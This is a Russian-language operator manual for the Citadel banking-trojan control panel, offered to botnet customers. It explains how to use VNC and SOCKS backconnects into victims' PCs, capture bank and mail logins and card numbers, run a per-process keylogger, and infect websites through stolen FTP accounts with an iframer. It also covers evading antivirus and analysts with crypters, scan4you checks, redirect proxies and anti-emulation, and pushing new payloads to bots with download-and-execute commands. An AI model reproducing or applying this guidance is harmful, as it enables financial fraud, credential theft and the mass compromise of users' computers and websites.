Если не знаете как поставить XAMPP, вот мануал: http://www.ripecms.com/documentation/articles/installing-apache-php

********************************************************************************
==========================>>>>> Установка Citadel VNC Admin
********************************************************************************

Если вы приобрели модуль VNC-админки, то в вашей панели будет доступен раздел "VNC".
Пробежимся по опциям, с которыми могут возникнуть трудности.
Для начала работы нужно нажать "Конфигурация" и вписать туда IP-адрес Windows-сервера, куда вы уже залили скрипты backconnect'a. Никаких путей не надо, просто IP-адрес.
Чем отличается коннект от автоконнект?
Если вы задаете коннект какому-то боту, то он разово выполнит эту команду и ыышлет вам данные для подключения. Если вы задаете автоконнект, то бот будет инициировать соединение с backconnect-сервером каждый раз, как только он выходит в интернет. Опция применима как к Backconnect Socks, так и к VNC.
Теперь зададим URL-маски, которые мы будем отлавливать в нашу VNC админку.
Маска URL: здесь указываем URL по схеме *mail.ru* или http://*.bank.com* (можно играться как угодно, звездочка вам в помощь)
Параметры: Здесь указываем названия POST-переменных, которые находятся на форме сайта, который мы ловим. На примере mail.ru, это будет Login* и Password*
Формат параметров простой, можно указать "login=", можно указать "login*", или просто "login". Поэтому выбирайте как вам удобнее, не забудьте протестировать маску.
Параметры не чувствительны к регистру.
Уведомлять в Jabber?: ставим опцию, если хотим чтобы каждый новый отловленный акк, приходил вам. Jabber задается в настройках, можно указать несколько через запятую.
ВАЖНО! Чтобы в разделе "Параметры" были вписаны данные Jabber-бота(Использовать исключительно Jabber.org), с которого все это будет идти к вам.
Также, есть возможность создания Автоконнекта с ботом, от которого пришел новый аккаунт в раздел. Т.е в жабер вам сразу приходит аккаунт + порт для коннекта на VNC/SOCKS.
Не забывайте, что работает контекстное меню напротив ботов, линков и т.п через правую кнопку мыши: можно удалить какие-то ненужные акки(отправить в мусор), пометить как Избранное или включить/отключить нужные настройки.

Строчка 2 ботов, 6 аккаунтов, 5 живых аккаунтов (83%) расчитывает % живых аккаунтов по принципу если бот не появлялся в сети более 4 дней, аккаунт считается мертвым.

Также, существует API для быстрого создания VNC/SOCKS соединения с нужным ботом, например во время перехвата токена или смс, вам нужно срочно зайти на акк под холдером, вы инжектом через javascript/iframe вызываете URL до api.php
 * 	VNCController
 * 		api.php/<token>/vnc/connect?botIP=1.2.3.4&protocol=VNC
 * 		api.php/<token>/vnc/connect?botIP=1.2.3.4&protocol=SOCKS
 * 		api.php/<token>/vnc/connect?botId=WIN-ABC123&protocol=VNC
 */
define('API_TOKEN_KEY', 'changethispassword');

И передаете IP или BotID, скрипт дает команду на установку соединения боту и данные приходят вам в жаббер. Тайминг зависит от параметра timer_stats в конфиге билдера.


Вот вам совет по работе с ботами на Win7/Vista: используйте Firefox portable для Win7/Vista - он работает корректно. Не забываем отключать wallpaper чтобы не гонять много трафика. Также, чтобы попасть в одну из директорий - нажимаем свойства ярлыка.

********************************************************************************
==========================>>>>> Установка модуля чекинга веб-соксов
********************************************************************************

Раздел "SOCKS" в админке - ничего настраивать не нужно.

********************************************************************************
==========================>>>>>  Установка модуля парсера логов
********************************************************************************

С версии 1.3.3.3 модуль доступен из админки, раздел "ссылки", сложностей возникнуть не должно.

********************************************************************************
==========================>>>>>  Работа с крипт-панелью
********************************************************************************
Существует раздел "crypt exe" он же "крипт ехе" и отображается он в основной админке Citadel. Если его нету, то читайте ниже как его активировать.
Он нужен для того, чтобы вы могли предоставить доступ вашему криптеру и он переодически перезаливал ехе-файл, который боты обновляют.
При этом, криптер не имеет доступа к остальным частям админки, для него доступен только этот раздел.
Для начала, активируем этот раздел у себя, для этого перейдем в раздел "Users", нажмем на свой логин и ниже отобразится список опций, доступный нам. Отмечаем галочками 2 пункта:
r_svc_crypter_crypt - Этот пункт дает привилегии перезаливать ехе файл.
r_svc_crypter_pay - Этот пункт дает привилегии вести таблицу оплат по перезаливкам.

Далее создаем нового пользователя и даем ему ТОЛЬКО "r_svc_crypter_crypt" права, передаем логин-пароль криптеру и он может через форму перезаливать ехе-файлы из папки files/
Не забудьте предварительно поставить chmod 777 на эту папку и доверять доступ только доверенным лицам.
Теперь, как только криптер перезаливает ехе-файл, появляется новая запись в таблице что данный ехе-файл не оплачен, вы же в свою очередь проверив все ли ок, помечаете у себя в админке что крипт Х такого-то числа оплачен.
Можно вписать данные для Jabber-уведомления по проверке scan4you в этом же разделе.


********************************************************************************
==========================>>>>>  Установка системы редиректов (прокладка для конфига)
********************************************************************************

Генерация прокладок (file.php) для защиты конфигов (полноценная система редиректов) BETA-версия.
Генератор прокладок решает проблему переноса file.php на отдельный хост, который вы можете юзать как редирект-прокладку до вашего основного файла конфига и ехе.

Генерация прокладки осуществляет через билдер, для этого добавлена кнопка "Собрать прокладку".
На выходе получаем 2 файла, file.php, file_config.php (имя указанное в диалоговом окне при сохранении игнорируется(!)).
ВНИМАНИЕ: file_config.php содержит ваш encryption key в преобразованном виде, он берется из вашего конфига, поэтому при генерации гейта конфиг должен быть настроенным и валидным,

Теперь загружаем файлы file_config,php, file.php на прокладку и создаем там же папку files, куда помещаем exe, config + video module файлы.

Для запрета прямого доступа к файлам в папке files создаем файл .htaccess следующего содержания:
deny from all

В настройках конфига задаем url_config1, url_loader до прокладки.

Если хотите защитить гейт  и создать для него прокладку, есть файлик other/redir.php, открываем его и прописываем путь до РЕАЛЬНОГО гейта
//URL оригинального сервера.
$url = "http://localhost/s.php";


После чего сохраняем срипт под любым именем и указываем в конфиге бота путь в качестве гейта (url_server)
!Важно! Чтобы на хосте были разрешены сокеты в PHP, иначе работать не будет.
Проверить это можно создав файл 1.php с <?php phpinfo(); ?>
Он должен показывать  Sockets Support 	enabled

Прокладки на данный момент не передают видео и скриншоты, только логи. Это единственный минус.!!

********************************************************************************
==========================>>>>>  Краткий мануал по новым фичам
********************************************************************************

1) В админке появилась новая секция "Эффективность и Безопасность", мы провели интеграцию с сервисом scan4you, и теперь вы можете одним кликом проверить все ваши ехе-билды на палевность сразу в админке Citadel, также, вы можете установить автоматическую проверку файлов раз в сутки, и если один из ваших файлов палится более чем 3я антивирусами, вы немедленно получите уведомление в ваш Jabber, чтобы вы могли
сразу заменить ехе. Теперь механизм будет работать за вас автоматически, ленитесь на здоровье!

=> Для начала нажмем кнопку Настройки: впишем туда Scan4you Profile ID(ИМЕННO ID, А НЕ ЛОГИН!!), Scan4you API Token, Jabber для уведомлений. Взять эти данные можно в настройках профиля scan4you.net
Потом идете в раздел ПАРАМЕТРЫ и  вписываете данные Jabber-бота (предварительно зарегав аккаунт для бота), рекомендуется юзать jabber.org
Все готово.

2) Некоторые клиенты жаловались на то, что лишь 40% ботов обновляется на новую версию ехе, остальные не могут обновиться по какой-то неизвестной причине. Действительно, баг остался еще со времен зевса, мы его исследовали и исправили. Теперь введен новый параметр в конфиге: timer_autoupdate 8
В котором задается время (в часах), как часто скачивать и перезапускать exe с сервера (RC4 encryption_key ключ должен совпадать). 80% ботов теперь обновляются успешно, криптуйте и перезаливайте ехе, живучесть повысилась на 45%, ваши боты будут иметь самый свежий и чистый билд.

=> Путь до ехе-файла берется из секции "url_loader", соответственно чем чаще вы перезаливаете чистый ехе, тем чище ехе-файл имеют ваши боты у себя. Они его скачивают и перезапускают, обновляя себя.


4) Формат видео от ботов изменен на .webm(HTML5), мы встроили онлайн видео плеер в админку Citadel, теперь вы можете смотреть видео прямо в вашем брауезере(рекомендуется Opera). Из возможностей: перемотка назад-вперед/фулл-скрин/поиск видео по BotID,IP-адресу,дате.
Но этого мало и мы пошли дальше, многие из вас используют(пора уже всем использовать и разрабатывать индустрию совместно) АЗ и персональные админки для инжектов/сбора акков и т.п. Вы бы хотели из вашей админки смотреть видео по заливу или как работает ваш инжект на боте? Легко! Мы создали API-систему, теперь вы можете передать BotID или IP-адрес скрипту, а API вернет вам готовый HTML-embed код всех видео по данному боту и вы можете вставить и смотреть видео хоть на narod.ru, не заходя в админку Citadel.

=> Это все можете вы увидеть в разделе онлайн-плеер, разберетесь сами там все просто.

=> Мануал по экспортеру видео-файлов для админок АЗ на основе онлайн-плеера.
Запросы такого вида:
/api.php/megakey/video/list.php?botnet=COOL&botIP=111.111.111.111
/api.php/megakey/video/list.php?botnet=COOL&botId=017_B4DF7611E03FF4C8
в ответ выдают php-массивы или JSON

Формат запросов:
api.php/<security-token>/video/<action>[.<extension>]?<params>
<security-token> параметр-ключ, который вы задаете в скрипте api.php и он нужен для авторизации на сервере.
<action> — команда
<extension> — (опционально) расширение: формат вывода. Если опустить — виден дебаг-вывод. Возвожные значения: .dump, .php, .json, .xml
<params> — параметры функции контроллера (можно посмотреть в коде)

Примеры запросов:
http://citadelhost.ru/folder/api.php/ahro4uNg/video/list?botnet=COOL&botIP=1.2.3.4
http://citadelhost.ru/folder/api.php/ahro4uNg/video/list?botnet=COOL&botId=WIN-ABC123
http://citadelhost.ru/folder/api.php/ahro4uNg/video/list?botnet=COOL&botId=WIN-ABC123&embed=1
http://citadelhost.ru/folder/api.php/ahro4uNg/video/embed?botnet=COOL&botId=WIN-ABC123&video=balakhan.webm

Параметр botnet не обязателен.
citadelhost.ru/folder/api.php/ahro4uNg/video/list?botnet=COOL&botId=SURAKSHYA-PC_775A658D6522DF69

И еще: подставив расширение — можно получить желаемый формат:
http://citadelhost.ru/folder/api.php/ahro4uNg/video/list.php?botnet=COOL&botId=SURAKSHYA-PC_775A658D6522DF69
http://citadelhost.ru/folder/api.php/ahro4uNg/video/list.json?botnet=COOL&botId=SURAKSHYA-PC_775A658D6522DF69
http://citadelhost.ru/folder/api.php/ahro4uNg/video/list.xml?botnet=COOL&botId=SURAKSHYA-PC_775A658D6522DF69

добавив параметр &embed=1 можно получить сразу HTML-код вставки  для всех видеофайлов, но не рекомендую: их может быть много) там для этого отдельная функция есть.
Пример без передачи имени ботнета:

http://citadelhost.ru/folder/api.php/ahro4uNg/video/list?botId=SURAKSHYA-PC_775A658D6522DF69
http://citadelhost.ru/folder/api.php/ahro4uNg/video/list?botId=SURAKSHYA-PC_775A658D6522DF69&embed=1


5) Добавлен удобный анализатор-парсер системных команд (CMDList) в админку, теперь вы можете посмотреть в новом формате в виде таблицы, результаты выполнения системных команд, таких как: ipconfig, список ПК в локальной сети, список процессов и т.п.

=> Увидите отдельный раздел "CMD Парсер".

6) Теперь при установке билда на бота, автоматически единоразово присылается в админку cледущая информация: установленные фаерволлы, установленные антивирусы, установленные программы.
Вы можете посмотреть информацию как для отдельного бота, так и для всего ботнета. Мы создали отдельный раздел, в котором вы можете посмотреть всю статистику в виде наглядного графика и подсчетов. Теперь вы знаете с кем бороться.

=> Раздел "Установленный Софт", если вы видите в графиках много "Unknown" значит на боте не стоит антивируса или фаерволла. Также, нажав поиск отчетов по боту, вы увидите новый вид отчета.

7) Добавлена возможность "Избранных логов", вы можете пометить любой интересный аккаунт(отчет) при поиске данных в админке, а потом без труда найти его т.к он будет выделен отдельным цветом в разделе "Избранные отчеты"

=>   Новые параметры в конфиг-файле.
enable_luhn10_get 1
enable_luhn10_post 1

GET LUHN10 - анализирует данные в GET-запросах и WinSocket/Wininet на предмет карт и дампов, по алгоритму en.wikipedia.org/wiki/Luhn_algorithm
POST LUHN10 - анализирует POST данные в https:// запросах.
Чтобы найти карты, выберите тип отчета: "LUHN10 запрос" в разделе "Поиск в базе данных".

8) Работа с API.php. Через API можно выдернуть ftp-аккунты для вашего ифреймера.
 *  IFramerController:
 *      api.php/<token>/iframer/ftpList
 *      api.php/<token>/iframer/ftpList?state=all
 *      api.php/<token>/iframer/ftpList?date_from=2012-12-31
 *      api.php/<token>/iframer/ftpList?date_from=2012-12-31&state=all
 *      api.php/<token>/iframer/ftpList?date_from=2012-12-31&state=all&plaintext=1

За остальными примерами работы с API, смотрите в комментариях к скрипту api.php

********************************************************************************
==========================>>>>>  Как обновлять админку и бота на следущие версии Citadel
********************************************************************************

Перезалейте и перезапишите все скрипты на сервере и зайдите в папку /install/, нажав кнопку Update - ждите пока ваши таблицы обновятся, это может занять долгое время.
Если у вас слишком забита БД, вам имеет смысл поставить админку заново в новую папку и перебросить на нее ботов командой user_execute http://www.host.com/newcitadel.exe
Обратите внимание, формат конфига с каждой новой версией может меняться, поэтому для того чтобы все работало корректно, настройте НОВЫЙ(идущий в архиве с версией) конфиг под ваши параметры и перезалейте его в папку files, вместе с exe-файлом и видео-модулем (ОБЯЗАТЕЛЬНО). Обращайте внимание на новые появившиеся опции в конфиг-файле, который мы даем вместе с билдером.
После чего, для того, чтобы ваши боты обновились на новую версию, дайте команду user_execute http://www.temphost.com/newcitadel.exe
Проверьте, что ехе доступен с веба по данному линку.
Enjoy.


********************************************************************************
==========================>>>>>  Описание дополнительных опций в конфиге билдере
********************************************************************************
  disable_cookies 1/0 - Если стоит 1, cookies не будут присылаться вам в админку.
  disable_antivirus 1/0 - Если стоит 1, модуль MiniAV будет выключен.
  enable_luhn10_get 1 - Модуль CardSwipe, если стоит 1, будет перехватывать карты/дампы в GET запросе.
  enable_luhn10_post  1 - Модуль CardSwipe, если стоит 1, будет перехватывать карты/дампы в POST запросе.
  remove_certs 1 - Если стоит 1, сертификаты слаться не будут.
  timer_autoupdate 8 - Время в часах, автообновления ехе из папки files/. Иначе говоря через сколько часов, скачивать и запускать ехе каждый раз.
  disable_httpgrabber 1 - Если стоит 1, отключается граббер HTTP отчетов в Google Chrome(только в нем)
  report_software 1 - Если стоит 1, отсылать информацию о фаерволле/антивирусе/софте в админку.

	Секция  entry "WebFilters"
  Для активации скриншотов, вставляем мачку "@*paypal.com/*"
  Если нужны скриншоты полного экрана, то "@@*paypal.com/*"
  Для активации видео-записи,  "#*paypal.com/*"

entry "WebFakes" - ВЕБФЕЙКИ НЕ РАБОТАЮТ!!


********************************************************************************
==========================>>>>>  FTP-ифреймер. Характеристика
********************************************************************************

A) Скрипт ифреймера
		Заливается на левый сайт и используется как "прокладка": осуществляет всю работу. Нажмите "Скачать скрипт" и залейте его по фтп на какой-нибудь левый хост.
		Им управляет специальный crontask из вашей админки.
		Возможности отладки:
			* Создать рядом со скриптом папку iframer/ доступную на запись. Туда он может сохранять предпросмотр ифрейминга файлов.
			* Создать рядом со скриптом файл 'iframer.php.log' (имя скрипта с расширением + .log): он туда автоматически начнёт писать логи действий, найденные папки, ...
			* Не забудьте выставить права 666,777 если хотите отладку сделать.
		Скачать его можно на странице ифреймера в панельке: [download].
		Физически он лежит в system/utils/. Здесь он напрямую не вызывается, просто хранится :)
		Сам ифреймер для работы не требует никаких файлов и прав записи: он аккуратно использует PHP-сессии для хранения даннях.
	B) Конфигурация
	Позволяет задать:
		* URL скрипта-ифреймера для запуска.
		* HTML-код для вставки
		* Режим действия. 'off' выключен, 'inject' вставлять HTML-код, 'preview' предпросмотр без изменения файлов на FTP: сохранять проифреймленные файлы в папку 'iframed/' рядом со скриптом (если она существует и доступна на запись)
		* Метод инъекции: умный(не повреждает PHP/JS/ASP файлы) , запись в конец, перезапись
		* Глубина обхода папок (уровни от 1 до 50)
		* Маски для файлов и папок.
		  Файл ифреймится только в том случае если и папка, и файл подошли к одной из масок.
		  Если папка совпала с маской — глубина обхода увеличивается (на случай глубоко заложенного public_html)
	C) Принцип работы клиентской части
		Во-первых, перед каждой фазой общения панельки с ифреймером последний проходит самотестирование: все ли жизненноважные для работы функции включены, предсказуемо ли ведёт себя сервер, .... Если selftest не выполнен — никакая работа выполняться не будет.

		Один cronjob раз в 10 минут собирает новые ftp-аккаунты из базы и создаёт задания. Повторные ftp-акки не допускаются.
		Эти аккаунты постятся на скрипт-ифреймер и добавляются к списку "заданий" вне зависимости от того запущен он сейчас или нет.

		Другой cronjob также выполняется раз в 10 минут. Он просто запускает скрипт-ифреймер: если он всё ещё работает — ничего не происходит, однако если он там сдох (например, time limit) — будет произведён перезапуск. Порог перезапуска 120сек

		И, наконец, последний cronjob: он каждую минуту спрашивает ифреймер как у него там дела: сколько заданий выполняется, сколько в очереди, сколько готово. Если есть аккаунты с которыми он уже закончил — они вытаскиваются и сохраняются. На ифреймере эти акки удаляются для экономии памяти.

		Во избежание возможных ошибок вся передача данных двухэтапная: запрос, ответ, запрос-подтверждение, действие.
		Если в течение суток по аккаунту нет результатов — он отправляется снова.
	D) Принцип работы самого ифреймера
		В начале скрипта указан список игнорируемых расширений файлов. Они не изменяются даже если подошли к одной из масок.
		Ифреймер хранит данные в сессии: они включены на всех хостингах и нет нужды играться с правами или искать папку доступную для записи :) Написан с учётом возможной работы даже под PHP4 (это надо проверить при случае).

		Ифреймер умеет правильно перезапускаться и дохнуть по timelimit'у: никакие важные данные не потеряются, он сможет продолжить с места остановки.
		При разрыве подключения ифреймер умеет реконнектиться при следующем запуске.

		Фазы работы:
		1. Попытка коннекта. Если она не удаётся 3 раза подряд — акк отмечается как невалидный.
			Если много акков к которым не удаётся подключиться — ифреймер может "подвисать" сгребая таймауты. Это нормально: он пытается :)
		2. Попытка аутентификации. Если не удаётся — акк невалидный.
		3. Листинг всех папок и файлов до указанной глубины. Выборка файлов и папок подходящих по маске указанной в админке. Для подошедших папок глубина обхода увеличивается.
		4. Фаза ифрейминга. Замечу, что в режиме 'preview' файлы на FTP не изменяются!
			Для каждого файла определяется его тип (по расширению), что определяет метод ифрейминга. Поддерживаются: html, php, CSS, JS, asp (и эквивалентные расширения)
			К коду ифрейма добавляется специальный маркер для избежания случайного повторного ифрейминга файла.
			В режиме smart код добавляется в начало php-файла, однако сам ифрейм выводится в конце :)
			В режиме append код добавляется в конец файлов. Умно определяется синтаксис чтобы не сломать код. JS-файлы заражаются через внедрение кода рисующего iframe.
		* На всех этапах собирается статистика, список изменённых файлов.

		Ифреймером управляют два задания:
		* "запуск" отрабатывает автоматом каждые 10 минут: он постит новые аккаунты и включает долгий процесс их проверки.
		* "сбор" — каждую минуту, забирает что готово
	E) Интерфейс
		Показывает состояние ифреймера (на самом деле, состояние cron-задач). Можно вручную дёрнуть задание чтобы обновить информацию.
		Показывает список аккаунтов. Для каждого: Состояние, ошибки, список страниц (по клику), статистика (по клику).
		Невалидные аккаунты удаляются через сутки: повисели и пропали.

	*) Принцип работы заданий и ифреймера на пальцах:

	Задание "запуск": раз в 10 минут
		Получить несколько новых акков и дописать их в конец списка задач.
		Дальше ифреймер проходит по списку задач (аккаунтов)
		Берём 1й акк. Коннектим. Не получилось в течение 10сек? Отложим, перепроверим.
		Берём 2й. Подключилось! Авторизация зато не удалась. С этим закончили, он невалидный.
		Берём 3й. Не коннектит. Тоже перепроверим.
		Берём 4й. Подключились. Авторизовались. Парсим.. ифреймим.. закончили, он валидный.

	Задание "сбор":
		оно в ЛЮБОЙ момент может подключиться и выхватить промежуточные результаты) Здесь это 2й и 4й, если они успели отработать.
		Когда 1й и 3й акк словят ещё несколько дисконнектов — они тоже будут отмечены как невалидные.


Добавленные позднее фичи:

- Режим "check only". Говорит за себя
- Опция: реифрейминг аккаунтов спустя N дней. Каждый аккаунт спустя N дней будет обработан заново.
- Замена старого ифрейм-кода новым. Если изменился HTML-код — он не тупо добавится а заменит собой старый :)
- Опция "ифреймить только вчерашние акки". Даст сутки на то чтобы игноры расставить)
- Логирование ошибок ифреймера (!)
- Умное распознавание папок (они неотличимы от файлов)
- Кнопка сброса. Благодаря защите от повторного ифрейма аккаунты она не испортит :) Заигноренные акки сохраняются (т.е. тоже не испортятся)
- Выборочный игнор аккаунтов (не ифреймить ни за что). Отмеченные игнором аккаунты отображаются сутки и прячутся. Если сделать сброс — они останутся и повисят ещё сутки.
- Сортировка: последние события (найден, отправлен, обработан) в хронологическом порядке сверху

- рычаг ручного запуска (полностью ручной режим). Это делается с помощью кликов по заданиям вверху, если ифреймер в режиме "off"
  Например: кликаешь первое, получаешь новые акки. Нужные заигнорил, кликаешь второе: они улетают на обработку.
  Третье задание — сбор результатов — всегда отрабатывает само :)

********************************************************************************
==========================>>>>>  Кейлоггер процессов
********************************************************************************
Для включения кейлоггера, в конфиге билдера прописываем новую секцию:

 entry "Keylogger"
    processes "calc.exe;*notepad*"
    time 1
  end

  *notepad* поиск нужного процесса по имени
  calc.exe точное название процесса
  Здесь мы перечисляем список процессов, на которые мы устанавливаем кейлоггер.
  Напомню, что кейлоггер по умолчанию включен для всех браузеров, поэтому пользуйтесь модулем, если вам необходимо отследить отдельно-взятые приложения.
  time 1 указывает на время в минутах, сколько минут подряд, с момента запуска приложения записывать клавиши.
  Секцию нужно прописать перед секцией  entry "CmdList" или после нее.

  Для поиска отчетов в админке, выбираем тип отчета: "Кейлоггер"

********************************************************************************
==========================>>>>>  Фильтровая GeoIP защита ботнета
********************************************************************************
Для включения модуля, заходим в раздел "Параметры" в админке, там есть пункт "Разрешённые страны", ставим галочку для включения и отмечаем нужные страны.
Все страны, которые будут не отмечены вами, автоматически попадают в игнор-лист, однако, отчеты от них все равно будут писаться, но при запросе конфига через file.php и отсылки запросов на гейт, ботам будет выдаваться ошибка 404 на уровне HTTP-сервера (это можно проверить снифером)
Бюджетный вариант от абуз. Рекомендуется использовать только для маленьких узконаправленных VIP-ботнетах, с целью перевода ценных ботов на особый ботнет.
Если заметили сильную нагрузку на сервер, немедленно отключайте настройку.

********************************************************************************
==========================>>>>>  Дубль-клинер логов
********************************************************************************

Для включения и отключения модуля, необходимо перейти в раздел "Параметры", подраздел Функции - "Дедупликация отчетов" включаем и отключаем.
Если заметили большую нагрузку на сервер, немедленно отключаем этот модуль в настройках.

********************************************************************************
==========================>>>>>  Общая рекомендация и частые вопросы
********************************************************************************
Для избежания проблем на сервере со скриптами, рекомендуется устанавливать PHP 4.3
Если вы хотите швейцарскую гарантию от реверса, вскрытия файлов на сервере, 100% защиты от трекеров и любых недугов, рекомендуем вам установить привязку на вашем сервере на страну, по которой вы работаете.
К примеру все ваши файлы по http будут доступны только юзерам, зашедшим с Испании, остальным, с других стран будет выдаваться 404.
Сделать это можно при помощи GeoIP модуля на сервер nginx, либо установить привязку на DNS.
Если интересно, можем дать команды хороших админов, кто может помочь в этом вопросе.
Как это сделать и советы по защите ботнета, вы можете ознакомиться в статье в "База знаний" внутри СРМ.
Также, хотим обратить внимание на то, что софт НЕ будет работать совместно с Proxifier'ом !
Если вы тестируете на виртуалке или у себя, обратите внимание чтобы у вас не было в системе русской или украинской раслкадки - иначе работать ничего не будет.
Также, вполне вероятны сбои на х64 - на система софт срабатывает корректно 50 / 50
Для просмотра видео в админке в онлайн-плеере нужно использовать Opera (насчет других браузеров хз как, пробуйте). У себя можно посмотреть через плеер VLC.
Теперь рекомендация криптерам по крипту Citadel:
- пеедавать адрес тело через GetModuleHandle с параметром NULL
- сохранять тело(целостность секций)
- сохранять оверлей
Инжекты полностью совместимы с зевсоформатом.
Не забудьте отключить антиэмулятор в конфиге, который задается опцией antiemulation_enable 1/0 (1 - включено, 0 - выключить).
Если опция включена, софт не будет работать на VMware, вместо этого софт будет генерировать кучу фейк-запросов на несуществующие домены, чтобы ввести в заблуждение автоматические ханипоты и реверсеров. Не пугайтесь этого :) Все запросы поддельные.
Если не знаете что такое антиэмулятор, посмотрите в самом начале анонос новостей.
Пароль на пришедшие в логи сертификаты: pass
Если испытываете проблемы с нагрузкой на сервер(админка еле грузится) попробуйте увеличить значение key_buffer  в 2 раза больше (к примеру 512M) в конфиге MySQL (my.cnf)

Еще хотим обратить внимание на параметры в конфиге,
например параметр timer_config 1 5

timer_config [number1] [number2]

Определяет интервал времени в минутах, через которое бот обновляет с сервера конфиг.

[number1] - интервал в минутах, действующий в случае успешной загрузки конфига в прошлый раз.
[number2] - интервал в минутах, действующий в случае неудачной загрузки конфига в прошлый раз (например в случае временной недоступности сервера или иными проблемами со связью, бот будет пытаться обновить конфиг через указанный промежуток времени)

timer_logs [number1] [number2]

Определяет интервал времени в минутах, через которое бот отправляет накопленные логи.

[number1] - интервал в минутах, действующий в случае успешной отправки логов на сервер в прошлый раз.
[number2] - интервал в минутах, действующий в случае неудачной отправки логов на сервер в прошлый раз. (например в случае временной недоступности сервера или иными проблемами со связью, бот будет пытаться отправить накопленные и накапливаемые далее логи через указанный промежуток времени)

timer_stats [number1] [number2]

Определяет интервал времени в минутах, через которое бот отстукивает в админку и получает из нее команды.
Из этих данные админка анализирует нахождение бота в онлайн, а также при каждом отстуке отправляет новые имеющиеся команды,
например, на открытие сокса.

[number1] - интервал в минутах, действующий в случае успешного соединения с админкой.
[number2] - интервал в минутах, действующий в случае неудачного соединения с админкой. (например в случае временной недоступности сервера или иными проблемами со связью, бот будет пытаться достучаться до админки через указанный промежуток времени)

timer_modules [number1] [number2]

Определяет интервал времени в минутах, через которое бот обновляет с сервера модули, например, видеомодуль.

[number1] - интервал в минутах, действующий в случае успешной загрузки видеомодуля в прошлый раз.
[number2] - интервал в минутах, действующий в случае неудачной загрузки видеомодуля в прошлый раз (например в случае временной недоступности сервера или иными проблемами со связью, бот будет пытаться загрузить видеомодуля через указанный промежуток времени)

timer_autoupdate [number1]

Определяет интервал времени в часах, при котором бот будет обновлять EXE с новым криптом.


[*]Что значит Unknown в статистике фаерволлов/антивирусов на pie-chart'e ? Это значит, что на ПК не стоит ни антивирус, ни фаерволл.
[*] ВАЖНОЕ ЗАМЕЧАНИЕ ПО КОМАНДАМ: ЕСЛИ ВЫ ДАЕТЕ КАКУЮ-ТО КОМАНДУ ЧЕРЕЗ РАЗДЕЛ СКРИПТЫ И УКАЗЫВАЕТЕ ВЫПОЛНЕНИЕ КОМАНДЫ НА ОПРЕДЕЛЕННУЮ СТРАНУ, НАПРИМЕР "US", ТО ОБЯЗАТЕЛЬНО ВКЛЮЧЕНИЕ В РАЗДЕЛЕ "ПАРАМЕТРЫ" ОПЦИИ "GeoIP по каждому отчёту (только небольшие ботнеты)"